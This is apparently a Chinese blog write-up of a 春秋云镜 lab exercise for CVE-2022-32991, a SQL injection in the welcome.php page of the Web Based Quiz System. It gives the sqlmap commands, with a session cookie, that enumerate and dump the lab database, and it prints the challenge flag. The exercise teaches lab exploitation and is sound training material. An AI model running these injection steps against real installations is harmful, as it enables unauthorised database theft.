春秋云镜 CVE-2022-32991

春秋云镜 CVE-2022-32991 Web Based Quiz System SQL注入

靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

1、启动场景
在这里插入图片描述
2、注册任意用户

在这里插入图片描述

3、登录成功进入主页
在这里插入图片描述
http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=1
q参数存在注入,使用sqlmap尝试未果,点击3.start(任意start都可)

在这里插入图片描述

在这里插入图片描述

http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10

python3 sqlmap.py  -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10"

sqlmap参数

参数详解
-u指定url
-D指定数据库名
-T指定数据表名
-C指定列名
–dbs获取数据库
–dump导出
–columns获取数据列
–tables获取数据表
–cookie指定cookie信息

在这里插入图片描述
重定向302,需添加cookie

python3 sqlmap.py  -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" --dbs

在这里插入图片描述
eid参数存在注入点,获取数据库ctf中的数据表

python3 sqlmap.py  -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" -D "ctf" --tables

在这里插入图片描述
获取fiag数据列

python3 sqlmap.py  -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" -D "ctf" -T "flag" --columns

在这里插入图片描述

获取fiag字段

python3 sqlmap.py  -u "http://eci-2zeibhtak45hqikoch7i.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1687146393,1687227019,1687314814; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1687328243; PHPSESSID=jcrla8optvjpmjparqm08bid4k" -D "ctf" -T "flag" --dump

在这里插入图片描述
得到flag

flag{baf0a619-41fe-4d10-b44c-faa99ee79cca}

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值